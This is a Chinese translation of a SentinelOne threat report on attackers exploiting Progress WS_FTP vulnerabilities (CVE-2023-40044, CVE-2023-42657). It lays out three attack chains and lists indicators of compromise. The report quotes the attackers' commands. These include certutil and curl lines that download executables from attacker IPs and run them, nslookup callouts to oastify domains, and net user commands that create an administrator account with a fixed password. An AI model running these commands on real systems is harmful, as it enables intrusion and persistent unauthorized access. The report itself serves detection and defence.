从 2023 年 9 月 30 日开始,SentinelOne 观察到攻击者利用Progress WS_FTP最近披露的缺陷来攻击运行该软件易受攻击版本的 Windows 服务器。两个最严重的漏洞 CVE-2023-40044 和 CVE-2023-42657 的 CVSS 评分分别为 10 和 9.9。我们观察到至少三种类型的多阶段攻击链,这些攻击链从利用开始,然后命令通常通过 IP 文字 URL 从远程服务器下载有效负载。
这种活跃的野外利用标志着2023 年针对 Progress Software 产品的第三波攻击。虽然利用可能是投机性的,但信息技术托管服务提供商 (IT MSP)、软件和技术、法律服务、工程和建筑、石油和天然气 (ONG)、医疗保健和非营利部门的组织都受到了影响。
技术细节
漏洞利用活动可能会显示在命令日志中,例如引用WSFTPSVR_WTM
父进程中的应用程序池以进行后续利用活动的活动,例如:
C:WindowsSysWOW64inetsrvw3wp.exe -ap "WSFTPSVR_WTM" -v "v4.0" -l
"webengine4.dll" -a \.pipeiisipme{GUID_String} -h
"C:inetpubtempapppoolsWSFTPSVR_WTMWSFTPSVR_WTM.config" -w "" -m 1
-t 20 -ta 0
利用 WS_FTP 漏洞后出现了多个攻击链。
攻击链 1:编码的 PowerShell 和 Certutil 提供 Metasploit
该漏洞利用命令调用以下命令:
1、检查系统架构是 32 位还是 64 位:脚本使用此信息从正确的路径运行 PowerShell
2、使用模糊字符串来禁用脚本执行的 PowerShell 日志记录
3、解码、提取并执行 Base64 编码、Gzip 压缩的字符串,并将解码后的值作为新进程启动
包含攻击链 1 的编码命令
l4函数:使用.NET反射从Windows API.GetProcAddressGetModuleHandle获取和方法
pR函数:设置要运行的动态程序集的参数。
$dYKA变量:解码base64编码的PowerShell代码,该代码包含从IP文本URL.certutil下载有效负载的调用
$pq5zc变量:使用.VirtualAlloc为外壳代码分配内存
将外壳代码复制到分配的内存中。
为外壳代码创建并执行一个新线程,以便使用所有已建立的参数运行。
负责运行certutil.exe调用的 C# 代码,该调用从远程服务器下载有效负载
新进程certutil.exe带有-urlcache从 IP 文字 URL 下载有效负载的标志。该命令的示例:
/c certutil -urlcache -f hxxp://103[.]163[.]187[.]12:8080/{22-length-alphanumeric-string}
%TEMP%{10-length-alpha-string}.exe & start /B
%TEMP%{same-10-length-alpha-string}.exe
已解码的certutil.exe命令,用于下载有效负载并作为新进程启动
83140ae9951b66fba6da07e04bfbba4e9228cbb8根据 VirusTotal 上的检测规则,从服务器下载的有效负载 (SHA-1: ) 被归类为 Metasploit stager。在这种情况下,活动崩溃,导致系统启动 Windows 错误报告二进制文件WerFault.exe. 因为几分钟后我们看到了更多的利用尝试,所以我们认为这次尝试没有成功,导致攻击者再次尝试。
攻击链 2:通过 cl.exe 进行 Curl 和实时编译
另一个攻击链用于curl下载使用 执行的有效负载cl.exe,在运行时动态编译有效负载。攻击链如下所示:
/c cmd.exe /c powershell -command "curl hxxp://34[.]77[.]65[.]112:25565"
/c cmd.exe /C curl 45[.]93[.]138[.]44/cl.exe -o C:/cl.exe
/c curl hxxps://tmpfiles[.]org/dl/2669853/client.txt -o $env:TEMP/cl.exe ;start-process $env:TEMP/cl.exe'
/c curl hxxps://tmpfiles[.]org/dl/2669123/client.txt -o $env:TEMP/cl.exe ;start-process $env:TEMP/cl.exe'
/c cmd.exe /C curl bgvozb1wnz86q952zxjlwusv2m8gw5[.]oastify[.]com
/c curl hxxps://tmpfiles[.]org/dl/2671793/sl.txt -o $env:TEMP/sl.exe ;start-process $env:TEMP/sl.exe'
/c cmd.exe /C curl qzt3iqkb6erl9oohic20f9bal1rsfh[.]oastify[.]com
/c cmd.exe /C C:/cl.exe
在分析时,这些tmpfiles[.]org文件不再可用,因此我们无法验证最终的有效负载。该域与 Burp Suite 的 Collaborator 产品相关联,该产品用于针对应用程序编程接口 (API) 进行安全测试。
虽然此工具可用于合法的安全测试目的,但我们无法确认此活动是否归因于进攻性安全团队。然而,AssetNote将查找集成到oastify[.]com其漏洞分析中,其中包含使用 Ysoserial .NET 反序列化小工具利用该漏洞的分步演练。防御者可以通过使用curl或nslookup的子域来识别这些调用oastify[.]com。
攻击链 3:可执行文件和 AD 活动
该攻击链使用了服务器ProgramData路径中的许多不同的 Windows 可执行文件。虽然调用了 PowerShell,但此攻击链不使用任何脚本。相反,下面概述的每个命令都由一系列可执行文件调用,这些可执行文件的短名称由一个字母和通常一个数字组成,例如n1.exe、n2.exe、s.exe等。我们无法获取这些二进制文件进行分析。
-i -c "cmd.exe /c c:programdataxmpp.exe"
-i -c "cmd /c net user temp p@ssw0rd123 /add && net localgroup administrators temp /add"
-i -c "cmd /c net user temp p@ssw0rd123 /add"
-i -c "cmd /c whoami"
-i -c c:programdataxmpp.exe ls c:programdata
C:programdataft.exe
/c cmd.exe /C nslookup 2adc9m0bc70noboyvgt357r5gwmnady2[.]oastify[.]com
该二进制文件xmpp.exe由 SimpleHelp(一家生产远程管理软件的公司)签名。xmpp.exe每次运行后续命令之前都会执行该二进制文件。攻击者很可能正在使用xmpp.exe一种远程访问工具。
temp攻击者尝试将使用密码命名的 Active Directory (AD) 用户添加p@ssw0rd123到管理员组,如果成功,这将提供权限升级。随后多次尝试添加同一用户而不添加到管理员组,最后调用 ,whoami显示控制台会话的活动用户。根据事件的顺序,添加管理用户的尝试很可能失败。由于此活动在whoami命令后停止,因此常规用户创建可能已成功。
结论
使用 Progress WS_FTP 产品的组织应立即更新或使受影响的系统脱机。这些攻击可能是机会主义的,攻击者会扫描互联网以查找易受攻击的系统。
将该活动与 6 月份 Clop 勒索软件组织发起的MOVEit大规模利用攻击进行比较时,我们发现了一线希望:与当今易受攻击的 MOVEit Transfer 实例数量相比, Censys 研究团队发现在线 WS_FTP 实例要少得多。
发现这些漏洞的研究人员指出,由于之前在 MOVEit Transfer 中的发现,他们研究了更多的文件传输产品。基于此,我们可以假设,随着研究人员专注于该产品套件,并且根据漏洞研究人员当前和之前取得的成功,对 Progress 给予额外关注,更多漏洞将被识别和武器化。
妥协指标
URL
hxxp://34[.]77[.]65[.]112:25565
hxxp://34[.]77[.]65[.]112:25565
hxxp://103[.]163[.]187[.]12:8080/3P37p073LKuQjOE64pjEVw
hxxp://103[.]163[.]187[.]12:8080/c8e3vG0e3TMiqcjcZOXhhA
hxxp://103[.]163[.]187[.]12:8080/cz3eKnhcaD0Fik7Eexo66A
hxxp://103[.]163[.]187[.]12:8080/cz3eKnhcaD0Fik7Eexo66A
hxxp://103[.]163[.]187[.]12:8080/cz3eKnhcaD0Fik7Eexo66A
hxxp://103[.]163[.]187[.]12:8080/Sw8J6d3NVuvrBiTCXrg4Og
hxxp://103[.]163[.]187[.]12:8080/xkJ5de2brMfvCNNnBoRRAg
hxxp://141[.]255[.]167[.]250:8081/o1X7qlIaYzSmCj[.]hta
hxxp://176[.]105[.]255[.]46:8080/aqmCG0mZlo_xnZRAWbz6MQ
hxxp://176[.]105[.]255[.]46:8080/OFmLqOxFRIkoENjCZsC7OQ
hxxp://176[.]105[.]255[.]46:8080/Rn0KQbPo22laaUbKGy30sg
hxxp://81[.]19[.]135[.]226:8080/_1TZ–18Hpqm06wvtjLMAg
hxxps://filebin[.]net/soa40iww2w8jhgnd/svchostt[.]dll
hxxps://tmpfiles[.]org/dl/2669123/client[.]txt
hxxps://tmpfiles[.]org/dl/2669853/client[.]txt
hxxps://tmpfiles[.]org/dl/2671793/sl[.]txt
45[.]93[.]138[.]44/cl[.]exe
域名
2adc9m0bc70noboyvgt357r5gwmnady2[.]oastify[.]com
bgvozb1wnz86q952zxjlwusv2m8gw5[.]oastify[.]com
qzt3iqkb6erl9oohic20f9bal1rsfh[.]oastify[.]com
IP
34[.]77[.]65[.]112
45[.]93[.]138[.]44
81[.]19[.]135[.]226
103[.]163[.] ]187[.]12
141[.]255[.]167[.]250
176[.]105[.]255[.]46
文件哈希值 – SHA-1
1d41e0783c523954ad12d950c3805762a1218ba6
1d7b08bf5ca551272066f40d8d55a7c197b2f590
32548a7ef421e8e838fa31fc13723d44315f1232
3fe67f2c719696b7d02a3c648803971d4d1fd18c
40b2d3a6a701423412bb93b7c259180eb1221d68
65426816ef29c736b79e1969994adf2e74b10ad8
790dcfb91eb727b04d348e2ed492090d16c6dd3e
83140ae9951b66fba6da07e04bfbba4e9228cbb8
83e6ede4c5f1c5e4d5cd12242b3283e9c48eea7e
8c14a4e7cee861b2fad726fc8dd0e0ae27164890
8dbca2f55c2728b1a84f93141e0b2a5b87fa7d35
923fd8fb3ddc1358cc2791ba1931bb4b29580bb6
98321d034ddc77fe196c6b145f126b0477b32db9
b4a5bf6c9f113165409c35726aec67ff66490787
b70aa1d07138b5cae8dd95feba9189f1238ee158
d00169f5eff9e0f2b5b1d473c0ee4fe9a3d8980e
d669b3977ebebf7611dd2cb1d09c31b3f506e9bd
e5ac227f143ec3f815e475c0b4f4f852565e1e76
f045a41def1752e7f8ef38d4ce1f7bd5e01490fc
转载来源:https://www.sentinelone.com/blog/threat-actors-actively-exploiting-progress-ws_ftp-via-multiple-attack-chains/
图片来源网络侵权可联系删除